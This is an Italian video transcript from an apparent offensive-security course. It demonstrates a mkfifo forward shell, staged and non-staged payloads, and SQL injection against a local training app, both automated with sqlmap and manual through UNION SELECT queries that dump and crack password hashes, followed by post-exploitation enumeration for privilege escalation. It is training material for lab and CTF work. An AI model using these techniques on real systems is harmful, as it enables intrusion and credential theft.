Ha una repo che si chiama tti over HTTP. Eccola qua. Apriamola un po, allarghiamo un po'. Come vedete qui ci dice che spesso può succedere che quando compromettiamo un server web <coughs> ci sono delle regole configurate, IP tables, quello che abbiamo appena fatto, che ci impediscono di ottenere una reverse shell sia via Netcat sia con Python e altre, cosine, altre utilità. E ci lascia questo strumento che ci dà la possibilità di ottenere una TT attraverso il file mkFIFO. E qui troviamo questo script in Python che lui ha fatto e che noi andiamo a studiare per capire come funziona appunto, eh, come intavolarsi questa connessione che ci dà una console interattiva simulata. Naturalmente come vedete qui ci sono delle cosine da modificare per utilizzare questo eh, script perché dobbiamo andare a mettere la giusta IP e eh, oltretutto poi è predisposto per il cmd quindi se rinominate quel file che abbiamo creato con un altro nome non va a funzionare pertanto qui dove c'è index php nel nostro caso dovremmo mettere cmd php ora quello che voglio che vediate è esattamente come funziona da dietro è inutile che noi prendiamo questo script lo lanciamo e abbiamo la console interattiva questo è abbastanza semplice come cosa. La cosa importante è capire cosa succede dietro perché riusciamo ad avere questa console. E la parte cruciale che ci fa capire come funziona questo script è esattamente questa linea. Perché è qui che va a fare l'MK FIFO. Quindi questa linea qui ce l'andiamo a copiare e a cercare di capire come funziona in modo tale che andiamo a capire cosa si sta automatizzando dietro. Questo lo possiamo chiudere. Ce ne apriamo un'altra. Ce ne torniamo in corso shell. Ci mettiamo come root. Ci creiamo eh, una cartella con scritto esempio. Ci mettiamo dentro esempio. E copiamo questo comando che ci siamo presi dallo script ora dove mette il, la percentuale s andiamo a mettere input anche qui dove mette percentuale s mettiamo input e qui al finale dove mette percentuale s mettiamo output diamo enter e adesso ci apriamo un'altra console sotto Facciamo un ls, andiamo in esempio, stiamo lì dentro e vedete che ci sono, sono stati creati file input e file output. Questo è quello, quello che succede se noi prendiamo questo script e lo avviamo. È quello che succede sulla macchina vittima. È il perché riusciamo ad avere una connessione anche se le connessioni in uscita sono bloccate. Questo è mkfifo e succede esattamente così se io per esempio qui faccio un eco uamai mi dice uamai giusto però se io faccio un eco uamai e lo mando all'input e dopo ah, eh, sudo su dicevamo io faccio un eco a uamai e lo invio nella cartella nel file input e dopo faccio un cat di output vedete che abbiamo l'output mi dice che sono root se io faccio un altro eco a ah, pvd e questo lo metto in input e dopo faccio un cat di output vedete che mi ha messo il comando il comando pvd è stato aggiunto sotto ed è tutto qui cioè stiamo giocando con MKFIFO e grazie a questo possiamo gestire i file e avere la connessione. E quindi stiamo più o meno simulando una console interattiva. È tutto qui. Pertanto, questo è come funziona l'ultima shell che dovevamo vedere, ossia la forward shell. Quello che vi consiglio come sempre è di fare molta pratica, di mettervi lì e provare, e scaricarvi lo script di Savitar. Eh, fare casini far uscire errori cercare di mettere a posto gli errori tutta questa è pratica e vi aiuta moltissimo apprendete molto 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 di più con la pratica praticando adesso un'ultima cosa che vorrei farvi vedere prima di chiudere il video ce ne andiamo su firefox è una pagina un'altra pagina bibbia tra virgolette che si chiama eh, monkey pentester dove potete andare a trovare tutte le shell in tutti i linguaggi che vi possono servire. Se noi facciamo Reverse Shell Monkey Pentester, ci apre questa pagina qui. Questa qui è la Bibbia per le shell, perché siccome vedete sotto abbiamo... Reverse Shell Cheat Sheet e c'è per tutti i linguaggi. Ce l'abbiamo in Bash, in Perl, in Python, in PHP, in Ruby, Netcat, l'abbiamo visto adesso, Java, eccetera, eccetera. Naturalmente ogni volta che andate ad applicare un tipo di queste eh, Reverse Shell dovete andare a modificare l'IP, mettere il vostro e mettere la porta che avete scelto dove siete in ascolto. Questo è un sito ottimo per quanto riguarda le shell. Ok, per questo video ci fermiamo qui e ci vediamo al prossimo dove andremo a vedere i tipi di payload. Abbiamo due tipi di payload: il payload staged e il payload non staged. E nel prossimo video andremo a vedere di che cosa si tratta. Ok, proseguiamo al punto 2 e andiamo a spendere due parole sui tipi di payload. Ne abbiamo due. Un tipo di payload è staged e un altro è non staged. Quello che dobbiamo andare a capire è la differenza. Cominciamo dal payload staged. Il payload staged è una carica utile, suddivisa in due o più fasi. La prima fase è un piccolo pezzo di codice che viene inviato alla macchina vittima e il suo scopo è quello di stabilire una connessione sicura tra noi attaccanti e la macchina bersaglio. Una volta stabilita la connessione, viene inviata la seconda fase del payload, ovvero la carica utile, quella vera e propria. Questo approccio consente a noi come attaccanti di aggirare alcune misure di sicurezza, appunto perché il carico utile effettivo non viene inviato finché non viene stabilita una connessione sicura. Ora, il payload invece non staged. È un tipo di payload che viene inviato come una singola entità. Non viene suddiviso in fasi come il payload staged. L'intero payload viene inviato alla macchina vittima in un unico pacchetto e viene eseguito immediatamente quando viene ricevuto dalla macchina vittima. Questo, naturalmente, è un approccio un po' più semplice, ma è anche più facile da rilevare da qualsiasi sistema di sicurezza che potrebbe esserci. Ora è importante tenere presente che il tipo di carica utile utilizzata in un attacco dipende sempre dall'obiettivo e dalle misure di sicurezza che sono implementate sulla macchina che andiamo ad attaccare. In generale i payload organizzati sono più difficili da rilevare e eh, sono preferiti per coloro che vanno ad attaccare, mentre i payload non organizzati sono più facili da implementare ma sono anche più facili da rilevare. Sono sicuro che molti di voi hanno già utilizzato sia un eh, payload di tipo staget, come uno eh, di tipo non staget. Guardate un po' questa immagine. Sono sicuro che qualcosa nell'ultima linea di entrambi i payload vi suona. Infatti, questo è uno degli esempi più lampanti quando andiamo a utilizzare MSF Venom. MSF Venom è un tool. Che insieme a metasploit andremo a vedere molto nel dettaglio però più avanti eh, tra qualche video sicuramente dopo aver visto tutte quante le vulnerabilità diciamo che questo è il concetto basico dei due tipi di payload ed è tutto quello che per adesso ci interessa e eh, dobbiamo sapere però se volete andare a ehm, approfondire un po' l'argomento naturalmente come vi dico sempre potete andare a cercare su google oppure andare sulla pagina di eh, rapid 7 che tra l'altro è la pagina ufficiale per quanto riguarda metasploit qui avete una descrizione più dettagliata per quanto riguarda i payload staged e non staged avete molte più informazioni ok questa era una piccola parentesi sui tipi di payload piccola ma importante da, da sapere e da tenere in conto, poi vedremo perché. Ci vediamo al prossimo video dove andremo a parlare di enumerazione del sistema. Bene, andiamo a vedere un esempio di quello che sarebbe un exploit manuale e un exploit automatizzato. Già solamente la parola fa una bella differenza, no? Però ora andiamocene a questa repo che state vedendo qui. SQL Injection Training App. Questo è un progetto molto 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 interessante, molto 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 figo e ha con sé eh, svariate cose che possiamo fare, però oggi andremo a usarne solamente una per questo esempio, anche perché entreremo nel dettaglio della SQL Injection veramente a breve perché sarà il primo argomento della prima vulnerabilità che andremo a fare in OWASP Top 10 e la faremo molto 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 nel dettaglio. Però quello che voglio farvi vedere oggi è come si potrebbe esplotare una SQL in action prima di forma automatica, quindi utilizzando uno strumento e successivamente di forma manuale. Ok, andiamoci a copiare come al solito la repo, cambiamo di finestra e ci andiamo a aprire una console. Ci mettiamo come root, ce ne andiamo dentro la cartella corso che abbiamo. Docker shell, facciamo, facciamo una cartella e la chiamiamo esempio. Ci mettiamo dentro la cartella. E facciamo un git clone di quello che abbiamo appena preso e ce lo tiriamo giù. Vediamo che il repo ci ha tirato giù, ci andiamo a mettere dentro al repo. Andiamo a vedere cosa c'è dentro. E guardate un po', che troviamo ancora una volta? Troviamo il nostro amato Docker Compose. Pertanto, andiamo a dare un docker trattino perché se no non gli piace, questo l'abbiamo capito nel tempo: docker, docker Compose App. E gli diamo Enter. E gli lasciamo fare le, le sue cosine. Ok, già ci siamo. Questo adesso continua a rannare eh, imperterrito, però ci ha già creato una pagina con eh, varie cosine che possiamo fare. Pertanto, adesso cambiamo schermata. Ci cioè andiamo ad aprire un Firefox e ce andiamo in locale a vedere che cosa abbiamo tirato su. Facciamo localhost. Andiamo a mettere la porta dove sta correndo questo servizio che abbiamo tirato su, che è la 8000. Mi Diamo Enter e si vola. SQL Injection Training App. Qui abbiamo molte cose da fare, e le faremo durante questo corso, però quello che andremo a prendere in considerazione per questo video è Search Product. Ed ecco qua che abbiamo un pannello, dove dobbiamo andare a inserire delle credenziali per poter entrare. Per esempio andiamo a mettere admin e password admin, facciamo submit e... E cazzo, siamo dentro! <ride> non me l'aspettavo, anche perché non c'è la password o l'username nella pagina. Vabbè, ok, siamo dentro. Vediamo un po' questa, questo form che fa. Se per esempio metto test succede nulla se metto 1 2 3 succede nulla se metto 4 non succede nulla e se metto 1 virgoletta attenzione qui abbiamo un errore del database questo è un errore nella sintassi sql questo lo andremo a vedere nel dettaglio più profondo a brevissimo nel video che faremo di SQL injection però eh, per dare una prima infarinatura è che mettendo questa virgoletta noi andiamo a dare una sintassi errata alla query che eh, c'è dietro perché naturalmente quando facciamo una richiesta a un database c'è una query che viaggia e tramite questa comiglia questa <coughs> virgoletta che noi mettiamo la rompiamo in qualche maniera e questo ci permette di andare a concatenare un altro tipo di query. Quindi adesso che sappiamo che c'è questa problematica, tu questo lo puoi fare in una maniera sia manuale che automatizzata. La puoi fare in una maniera manuale se hai il controllo e la conoscenza di SQL Injection. Vediamo eh, per cominciare come farlo in maniera automatizzata utilizzando uno strumento che ci automatizza tutto quanto e questo strumento è SQL Map. Questo strumento SQL Map ti permette di automatizzare delle iniezioni, quindi fa lui stesso multiple iniezioni al ehm, database che noi gli andiamo a passare. Fa anche una ricerca per andare a vedere in quale punto è vulnerabile, ti può dumpeare, quindi tirar giù eh, delle informazioni appunto dalla base di dati tavole, colonne e infine tutti quanti i dati. Però prima di avviare eh, SQL Map apriamoci un attimino Bursuit vi ricordate che facciamo con l'appersan maggiore mandiamo al dev null e poi gli concateniamo il comando Dyson questo lo facciamo perché così possiamo aprire Bursuit e non, è <coughs> non ha dipendenze dalla, ehm, dal terminale da dove l'abbiamo aperto nel senso che adesso io mi posso chiudere questo terminale e bursuit non muore rimane qua Gli diamo start anche bursuit a brevissimo tra un paio di video lo andremo a vedere molto più nel dettaglio perché, perché quando adesso cominceremo tutte le varie vulnerabilità web wasp top 10 lo utilizzeremo molto burzweet quello che voglio andare a fare è andare a intercettare la petizione che facciamo quando inseriamo qualcosa in, ehm, nella pagina che ci siamo tirati su ossia qui pertanto andiamo a fare proxy siamo già su intercept on torniamo sulla pagina Andiamo a attivare qui il proxy, ve lo ricordate? Abbiamo Bursuit. Andiamo qui e gli andiamo a dare test. Gli diamo search, lui continua a caricare, rimane bloccato perché stiamo eh, intercettando la petizione. Ce ne andiamo su Bursuit e vediamo che qui l'abbiamo intercettata. Adesso facciamo una cosa, qui andiamo a dare un clic eh, destro e andiamo a fare Copy to File per andare a salvarci <coughs> questa petizione in un file. Andiamo a salvarlo in corso hacking, esempio, SQL injection, e lo andiamo a chiamare request.rec. Lo salviamo e adesso torniamo alla nostra console. Allora, qual è l'idea? Vediamo intanto se abbiamo salvato il file e direi di no. Non ce l'ha scritto? No, non ce l'ha scritto. Ok, già ho capito quello che è successo. Allora andiamo a fare un ch o o a robby 7979 robby 7979 e gli passiamo la cartella perché se no non l'ha potuto scrivere. SQL, eh, dobbiamo farlo da fuori però, sì. Allora facciamo un salto indietro e riscriviamo choo robbie7979 robbie7979 Diamogli anche di forma recursiva un meno r alla cartella SQL. Operation not permitted. Operation not permitted. Se facciamo... <coughs> Facciamo una cosa, andiamo indietro e diamoglielo a tutto quanto di forma ricorsiva però da corso hacking. Quindi facciamo un salto indietro e un salto indietro ancora e glielo diamo sulla cartella corso hacking. Facciamo anche un sudo. Gli diamo la password. Ok, adesso dovremo poter eh, creare il file. Torniamo a Bursuit che ce l'abbiamo qui facciamo tasto destro copy to file ce lo mettiamo qui dove abbiamo messo prima request.rec facciamo save e andiamo a vedere se questa volta ce l'ha salvato quindi ci clicchiamo dentro corso dentro esempio e facciamo un ls ok dentro sql LS ed eccolo qua, adesso ce l'ha salvato, request.rec. Ok, dunque, noi abbiamo questo, no? Questo è un file che ha tutto il corpo della petizione che abbiamo intercettato con suite E qui sotto vediamo eh, questo search item che attualmente vale test. Però abbiamo anche visto che se gli mettevamo una virgoletta ci dava un errore di sintassi. Allora quello che possiamo fare intanto è prenderci questo valore qui e poi andare ad utilizzare SQL Map dove noi possiamo dirgli che eh, si deve prendere il nostro eh, um, file che abbiamo creato e con il meno p gli andiamo a dire che questo è il valore che vogliamo che va a provare a vedere se è vulnerabile. Gli possiamo dare un meno meno dbs. Per dirgli di dumpearmi tutto quello che puoi, oppure quello che potremmo fare ancora prima di andare a dumpeare tutta la base di dati è eh, intanto dargli un batch. E voi direte: da che serve il batch? Il batch serve per far sì che eh, SQL Map non. Lì ogni momento a farti delle domande perché se noi lo lanciamo senza batch, sicuramente avrete visto che comincia a fare delle domande se vogliamo utilizzare questo, se vogliamo utilizzare quell'altro, invece, se noi mettiamo batch, lui già individua qual è la cosa migliore da fare e non sta lì ogni due secondi a farci delle domande se vogliamo provare eh, altri tipi di eh, linguaggi, se vogliamo fare altri test, eccetera, eccetera. Infatti, adesso se noi gli andiamo a dare enter. Lui comincia a fare tutte le sue prove e come vedete non c'è nessuna domandina di quelle domandine fastidiose che ci fa. E adesso che ha finito, a me già essendo un attaccante mi interessa vedere in maniera automatica se lui ehm, riesce a capire se c'è un parametro che è iniettabile. E già qui, come vedete, dice il parametro post search item, appare MySQL ed è iniettabile. Quindi già qui ce lo dice. Ci dice anche che è un time-based, ossia è un'iniezione basata sul tempo. Questo lo andremo a vedere molto nel dettaglio a brevissimo in, nel video di SQL Injection. Vediamo che anche qui ci ha detettato delle cosine, quindi comunque sappiamo che è iniettabile. Quindi adesso se vogliamo, gli possiamo andare a chiedere di eh, tirarci giù la base di dati. Quindi gli facciamo D, dbs, vediamo Enter. E guardate, eccola qua. Questa è la base di dati Available. Come abbiamo già visto anche in un video precedente che feci su SQL Injection, abbiamo la base dei dati, poi abbiamo le tavole, le tables, poi abbiamo le colonne, e poi nelle colonne abbiamo i dati. Comunque di questo non preoccupatevi perché a brevissimo faremo un video dettagliatissimo su SQL Injection. Però vediamo, cominciamo a fare qualche cosina. Per esempio, io adesso, per la base di dati che abbiamo visto, che si chiama Training, posso chiedergli di tirarmi giù le tavole, le tables. Mi diamo Enter, ed eccola qui, guardate: abbiamo User e Product. Quindi abbiamo due tables, naturalmente quella di user mi salta all'occhio ed è quella che mi interessa, perché sicuramente avrà delle colonne dove ci sarà username, password, eccetera. Pertanto adesso io posso andare a dirgli che voglio che per la tavola users mi vai a enumerare le colonne, columns. Mi do enter ed eccole qua. Guardate le colonne: description, fname, id, password e username. E qui al lato abbiamo anche il tipo. Quindi stiamo vedendo che SQL map ci sta automatizzando tutto. Quindi adesso abbiamo visto le colonne, la parte finale è andarsi a prendere i dati. Pertanto noi possiamo andare qui e andare a dirgli un -c e gli dico oh, mi serve username e voglio anche password. E gli dico Dump, dumpamelo, tiramelo giù. Mi do enter. Adesso lui si prende i suoi tempi, e intanto vedete però già qui che lavora. E alla fine ci dà l'username, la password e la password in chiaro. In questo caso è riuscito anche a farcelo vedere in testo chiaro. E in testo chiaro la password. Admin, perché? Perché la password è in md5, questo è un md5. Quindi oltre a prendere la password e l'username, ce l'ha anche craccata e ce l'ha messa in chiaro. Pertanto questa è stata un'esplotazione automatizzata. Però badate bene che eh, questa esplotazione automatizzata in alcune certificazioni non è consentito. Per esempio nell'OSCP se vai a fare una cosa del genere ti annullano subito l'esame. Questo eh, naturalmente ti obbliga... A tenere ad avere un controllo manuale eh, maggiore perché naturalmente, se devi andare a fare l'OSCP e devi fare una SQL in action, questo eh, SQL Map, questo strumento automatizzato, non lo puoi usare, quindi devi andare a fare l'esplotazione a mano, manuale. E adesso infatti andiamo a vedere come fare tutto questo, però in maniera manuale. Come vi ho detto, non vi preoccupate perché tra pochissimi video andremo a fare un video specifico SQL SQL Injection. Andremo molto, molto in profondità. Però intanto oggi vediamo per vedere la differenza tra questa automatizzazione e rifarlo uguale, però manualmente. Torniamo al Bursuit. Andiamo a fare un tasto destro, e, oppure un CTRL-R se preferite, e mandiamo questa petizione al repeater. E adesso che siamo nel repeater... Se noi gli diamo a send qui vediamo la risposta, qui abbiamo la richiesta e qui abbiamo la risposta del server. Ingrandiamolo un po' così si vede un pochino meglio. Se per esempio gli diamo a render vediamo esattamente la pagina. Questo piazziamocelo giù così magari si vede meglio. Sì, ok, perfetto. Questo ce lo tiriamo un po' su. Ok. Dunque qui avevamo eh, il parametro iniettabile, no? Pertanto se io qui vado a mettere una virgoletta, come abbiamo già visto all'inizio e vado a fare send. Vedete che sotto abbiamo un errore. Ora, adesso io questo lo vado a spiegare abbastanza rapidamente. Però, come vi ho già detto spesso, eh, poi lo vedremo nel dettaglio in profondità. SQL Map lo, eh, in action lo vedremo molto molto in profondità. Quello che posso andare a fare, posso andare a fare un order by e gli metto 100, trattino trattino trattino, posso andare a cercare di fare un ordinamento basato sulla colonna numero 100, ossia una colonna che considero che non esiste. Se adesso gli do send, guardate, mi sta scrivendo unknown column 100 in order clause. Come ho già detto... <ride> E ribadisco, nel primo video di quando cominceremo a fare l'esplorazione parleremo in profondità di tutto questo, però adesso andiamo avanti. Io adesso quello che cercherò di fare è di continuare cercando di capire quante colonne sono presenti. Adesso per esempio gli do 9. E lui mi continua a dire che la colonna è sconosciuta, pertanto non c'è. Provo un 5, faccio send. E guardate, questa volta l'errore non me l'ha dato. Pertanto già così abbiamo determinato che sono presenti 5 colonne. Pertanto adesso che sappiamo che abbiamo 5 colonne io posso andare ad applicare un union select e gli do 1, 2, 3, 4, 5. Gli do ascend e guardate qui sotto. E adesso è quando entra in gioco l'iniezione. Se io al posto di test metto database e mando la petizione attenzione guardate che cosa è uscito qua questo è il nome del database l'abbiamo visto prima in questo metodo io potrei anche andare a chiedergli quale user è il proprietario di questa base di dati quindi potrei fare user faccio send e guardate, root chiocciola 172.26.0.3? Quindi io a questo punto potrei anche andare a denumerare tutto quello che voglio. Per esempio, io qui potrei andare a scrivere schema name, e dopo gli vado a dare al posto di queste gli metto from information schema punto schimata. Ora, queste query che io sto facendo eh, è solo questione di pratica, perché sono sempre le stesse, quindi non è tanto il discorso di impararle a memoria, ma proprio di praticare. Una volta che voi continuate a praticare, poi vi vengono in automatico. Andiamo a send e guardate un po' che abbiamo qui. Abbiamo tirato fuori tutte le basi di dati che ci sono. Questo, questa base di dati SQL Training l'abbiamo vista prima. Andiamoci a lavorare questa, quindi adesso io potrei tornare indietro e mettere qui invece che schema, mettere table. Dopodiché torno indietro, information schema.table, e gli scrivo where table schema è uguale a... Il nome della, del database che ci interessa in questo caso SQLI Training. In pratica, cosa gli sto dicendo? Voglio che mi enumeri la tavola, la table per questa base di dati. Facciamo send e ci dice anno un table in information schema. Vediamo cosa ho sbagliato. E beh, è chiaro: qui non ho messo una S perché va messo information schema tables tables non avevo messo la S, andiamo send ed eccole qua vedete ci ha tirato fuori queste due tables user e product quello che abbiamo fatto con SQL Map, ma lo stiamo facendo manualmente. Adesso vogliamo andare a denumerare la tavola user, quindi torniamo indietro è sempre la solita storia. Andiamo qui e invece di tables mettiamo column dopodiché andiamo avanti information schema. Punto, non tables ma column quindi anche qui mettiamo column e where table schema naturalmente lasciamo il nome eh, del database però scriviamo and table name è uguale a user quello che vogliamo enumerare andiamo send E ho scritto male qualcos'altro. Eh sì, ancora una volta, come prima, mi sono dimenticato di mettere la S su information schema. Qui è l'unico punto dove bisogna mettere al plura plurale. Facciamo send. Ed ecco qua che ci sta tirando fuori le colonne, quella che ci interessa da noi: username password, chiaramente no? Adesso possiamo andare a giocare con un group concact. Per andare a concatenare le due colonne che ci interessano e tirarci fuori i dati ragazzi state calmi se non ci state capendo nulla e vi sta scoppiando la testa eh, voglio solamente farvi vedere la differenza tra eh, un'esplotazione manuale e un'esplotazione ehm, automatizzata poi questo dell'SQL in action lo faremo in profondità, vedremo tutto per bene da zero, ci monteremo un laboratorio e faremo tutto nel video SQL, non vi preoccupate. Comunque adesso io per esempio posso andare qui a togliere column name e gli posso andare a dire group concat e ci mettiamo dentro username, username, dopodiché gli posso dare virgola e poi gli do uno 0x3, che in esadecimale sono due punti, quindi abbiamo detto virgola, 0x3, dopodiché virgola e gli do password. Quindi sto concatenando le due cose che mi interessano, qui non mi è uscito il 3, ok? Dopodiché vado alla fine tolgo tutto questo qui e scrivo from user che è la tavola che mi interessa. From users. Gli do enter, gli do send ed ecco qua guardate. Vedete questo di admin, poi un hash, poi Bob, poi un altro hash, poi Ram, Ramesh e un altro hash. Bene, questi sono l'user. E le password in md5 possiamo farlo anche in un'altra maniera in modo tale che venga rappresentato in una, eh, di una forma un po' più carina e leggibile. Per esempio, possiamo andare a eh, levare qui e mettere nel campo 2, per esempio, mettiamo user, user name, poi mettiamo nel campo 3, mettiamo password e poi qui togliamo la virgola, lasciamo una. Se noi facciamo in questa maniera e facciamo send, vedete, vengono rappresentati in una maniera un po' più leggibile. Ora, come attaccante, che potrei fare? Potrei andarmi a prendere queste password in MD5, passiamo in RAW, perché se facciamo da qui, per esempio, non me le fa copiare, vedete, sto schiacciando ma non me le fa copiare. Se andiamo su RAW e scendiamo, eccole qua, lo vedete? Ce l'abbiamo qui quindi questo ce l'andiamo a copiare tutto, anzi no, è meglio andarcelo a copiare da pretti perché su RAW abbiamo un sacco di tag, andiamo su pretti, però giustamente su pretti non c'è perché abbiamo utilizzato il secondo metodo per vederlo meglio in render, vi ricordate? Dobbiamo tornare a fare il metodo precedente per poterlo andare a vedere su pretti e poi andarcelo a copiare perché come abbiamo detto qui non si può copiare, quindi torniamo alla petizione precedente quella che avevamo usato Group Contact, andiamo in Pretty, scendiamo, e adesso sì che ce l'abbiamo, vedete? È tutta questa traia qui. Ora ce la possiamo prendere e ce la possiamo andare a copiare. Facciamo tasto destro e facciamo Copy. Ce ne torniamo alla console e ci andiamo a creare un file chiamato Data. Lo apriamo e ci copiamo tutta quella robina là che ci siamo eh, andati a prendere ora, qui naturalmente non si vede bene, però vedete ci sono eh, l'username e l'md5 username md5. Possiamo, volendo, andarlo a ordinare un pochino, tanto vediamo che è diviso eh, dalle virgole. No, tanto mettiamo i due punti tra l'username e l'md5 poi leviamo la virgola, ce lo mettiamo giù. Bob, mettiamo due punti. Ora, se lo avevamo aperto con Vim. C'è una maniera per fare questa cosa tutta automatizzata, poi magari la vediamo, però adesso ormai siamo qua, quindi facciamo in maniera manuale. Tanto non sono moltissime, abbiamo già finito. Anche questa, vediamo la virgola, la mettiamo giù, gli mettiamo i due punti. Poi c'è Frodo, aspetta, qui c'è Voldemort, due punti. Frodo, due punti. Odor. Leviamo la virgola, due punti, e come ultimo c'è rombus. Leviamo la virgola, due punti. Ok, adesso ce lo salviamo, facciamo ctrl x, yes, ok. Se gli diamo un cat a questo file che appena abbiamo creato, vediamo che qui abbiamo l'username e la password in md5. Possiamo andare a vedere se effettivamente è MD5 perché l'MD5 è formato da 32 caratteri, quindi possiamo fare un eco-n, ci copiamo questo con F1 e lo andiamo a mettere qui dentro con F2, poi gli diamo un pipe e gli facciamo un VC-C. Diamo enter e vediamo che effettivamente sono 32 caratteri. Adesso possiamo andare a craccarla in varie maniere. Abbiamo John the Ripper, abbiamo un sacco di pagine, per esempio, che anche lì è molto comodo, ce cioè le copiamo su una pagina, per esempio, no? Pertanto andiamoceli a mettere a posto per poi andarcela a copiare. Possiamo fare un cat data, gli diamo un pipe, andiamo a usare avk e gli andiamo a dire con le parentesi graffe che vogliamo... Eh, solamente il secondo argomento ci interessa perché perché noi vogliamo solamente la password, no? Qui mettiamo la virgoletta e poi gli diamo un fs uguale e gli diamo il separatore, il secondo argomento delimitato da il separatore. Qual è il separatore? Il separatore sono i due punti, i due punti che abbiamo qua. Se tu adesso gli dai all'enter, vedi che eh, ci abbiamo attenzione che qui c'è una virgola. Andiamo a toglierla, facciamo un nano data Scendiamo qui e andiamo a togliere questa virgola che è rimasta. Ok, salviamo e gli diamo lo stesso comando di prima. E adesso abbiamo solamente le password che possiamo andare a prenderle e a copiarcele. E adesso ce ne andiamo su una pagina per andare a craccare. Per esempio, c'è una buona pagina. Dobbiamo togliere Bursuit, se no non ci fa andare. Ok? Una buona pagina è ashes.com. Ashes.com. Questa qui. Se adesso noi ci andiamo a copiare le password, le clicchiamo su Show Algorithm of Found, gli diamo Submit and Search e guardate. Ce l'ha craccata in chiaro e ci dice che è un MD5. Vedete admin password, odor alice 1. E questo è il procedimento per andare a esplotare una pagina web in maniera manuale con il SQL in action. Quindi abbiamo visto prima il procedimento automatizzato con SQL map e adesso abbiamo visto invece il procedimento in maniera manuale naturalmente oltre al SQL injection hai molte, molte molte altre vulnerabilità come hai molti molti altri strumenti che ti au automatizzano eh, l'esplotazione però naturalmente come dicevamo prima a parte il fatto che a noi piace fare le cose manuali e capire cosa succede da dietro ma oltretutto questi strumenti automatizzati per determinate certificazioni come l'OSCP non sono consentite, non le puoi utilizzare come per esempio anche Metasploit, è un altro eh, strumento automatizzato che andremo a vedere a fondo più avanti ed è un altro strumento che per esempio nell'OSCP non puoi utilizzare. Bene signori, per questo video è tutto, ci vediamo al prossimo. Ok, proseguiamo. Allora, eh, prendiamo in considerazione il seguente scenario. Diciamo che voi siete riusciti a compromettere una macchina, ossia la mia macchina, questa macchina Parrot. Pertanto facciamo finta che la mia macchina è la macchina vittima. Quindi noi, come attaccanti, abbiamo eh, preso il controllo del sistema. Siamo riusciti a entrare e a compromettere la mia macchina, Parrot. Pertanto adesso che cosa facciamo? Qual è il seguente passo una volta che tu riesci a compromettere un, eh, un, una macchina? Adesso dobbiamo fare la fase di riconoscimento. E voi direte ma l'abbiamo già fatta, sì, ma questa volta una volta entrati nella macchina vittima dobbiamo fare la fase di riconoscimento del sistema e voi direte ok ma che, che cosa devo riconoscere? <coughs> beh normalmente quando noi andiamo a compromettere una macchina come avrete già visto o se non l'avete visto ve lo dico io spesso e volentieri avete accesso a questa macchina ma non avete accesso come ehm, un user con dei privilegi quale può essere root in linux o nt authority in windows come per esempio quando facciamo le macchine su Hack The Box o tra Acme o hub, noi riusciamo a compromettere la macchina, entriamo dentro la macchina, ma vediamo che eh, non abbiamo dei privilegi, non siamo root. Dobbiamo però andare a diventare root perché quando facciamo una CTF, per esempio, dobbiamo andare a cercarci delle flag che sono dei file in hash che noi andiamo a prendere a copiare sul sito dove c'è la macchina. E così andiamo a dare la conferma che siamo riusciti a entrare nella macchina. Abbiamo preso questa flag, questa ehm, bandiera, questo hash, e lo andiamo a copiare come detto sulla pagina dove abbiamo avviato la macchina. Che può essere Hack the Box, Triacmi o quello che sia. A conferma che siamo riusciti a entrare e a scalare i privilegi. Quindi a essere root e a prendere la flag di root. Solitamente abbiamo sempre due flag, la flag user che è la prima che si trova appena si compromette la macchina e poi la flag di root che è quella che eh, si riesce a trovare una volta che abbiamo elevato i nostri privilegi, che siamo diventati un super user. E per diventare super user dobbiamo cominciare ad enumerare il sistema. Anche nella vita reale, quando si va a fare un pentesting, spesso e volentieri, se riusciamo a compromettere la macchina, non avremo l'accesso come root o un accesso privilegiato. Pertanto quello che avviene adesso è la fase di riconoscimento a livello di sistema, per andare a cercare una qualsiasi cosa con il quale noi possiamo andare a sfruttarla. Per passare da utente normale a utente privilegiato a root in Linux a nt authority in Windows. Ci sono molti ehm, strumenti che ci aiutano a fare questo eh, riconoscimento a livello di sistema e a cercare di trovare de delle problematiche o, o a sfruttare alcuni file interni al sistema per poi andare a scalare. I privilegi, quindi a diventare root. Però come al solito c'è sia la parte automatizzata grazie a degli strumenti, ma puoi farlo anche manualmente con una serie di comandi. Più avanti nel corso faremo la sezione dedicata proprio alla scala dei privilegi e andremo a studiare eh, come fare la scala dei privilegi, eh, che cosa si usa, perché si usa e come usarlo. Però per il momento andiamo a vedere come enumerare un sistema una volta che abbiamo compromesso una macchina. Pertanto, cominciamo a vedere qualche strumento che ci aiuta a fare l'enumerazione di sistema. Per esempio, questo qui, che è uno script di eh, Diego Treitos, Si chiama Linux Smart Enumeration, ossia LSE. Questo è uno script molto carino, fatto con colori e anche molto, molto potente. Andiamocelo a vedere. Ce l'apriamo. Andiamo a mettere row e ci andiamo a copiare il link. Ce ne torniamo in console e possiamo fare una cartella chiamata enumerazione. Ci mettiamo dentro a questa cartella e facciamo un vget di quello che abbiamo appena preso. E ce lo tiriamo giù. Facciamo un ls. Vediamo che sta qui e gli andiamo a dare il permesso di esecuzione a LSE. Tanto per cominciare, come al solito, andiamo a chiederci come si esegue questo script. Quindi se andiamo a fare un LSE.sh e credo che se facciamo un "-h", ci sia un, eccolo, un menu che ci dice le varie opzioni che abbiamo. Possiamo con "-c", disabilitare il colore, ma a noi ci piace il colore. Abbiamo vari livelli. Che vedete qua, dallo 0 al 2, livelli di profondità per andare a fare questa enumerazione. Se naturalmente lo avviamo senza dar nessuna opzione, lui di default ci dà un livello di profondità 0, quindi prende le prime informazioni, quelle più superficiali. Ora proviamo a eseguirlo e vediamo che cosa fa su questa macchina vittima che sono io stesso. Vediamo ok. E ci dice se, eh, hai, se conosci la password di qualche user eh, mettila perché ci può aiutare per andare a fare una scalata di privilegi io non ho nessuna password gli do enter e vediamo che sta cominciando a lavorare lasciamolo fare e ci vediamo quando ha finito ok ha finito ci ha messo un pochino però ha fatto un'ottima enumerazione per esempio guardate qui abbiamo current user group yes ci dice yes <coughs> però non ci riporta effettivamente tutto perché, perché abbiamo scelto il livello di profondità 0 che è quello di default per esempio abbiamo un sacco di informazioni other user with shell abbiamo un altro yes pet variable defined inside abbiamo un altro yes però non ci sta riportando tutto ci sta solamente riportando un Yes. Perché? Perché, come abbiamo detto, abbiamo utilizzato un livello di profondità di default che è lo zero. Se noi andiamo a fare un livello di profondità più profondo, ci comincia a tirare fuori anche queste informazioni. Questa è una prima scansione, eh, diciamo, superficiale. La cosa ottima è che ti fa un riconoscimento integro, un riconoscimento totale del sistema. E cerca di applicare determinate cose per andare a vedere come riuscire a ehm, scalare i privilegi, quindi a farti diventare root o NT authority in Windows. Per esempio, guardate qui, ci dice che ci sono dei container. Is Docker available? Yes, ed è vero, perché noi abbiamo dei 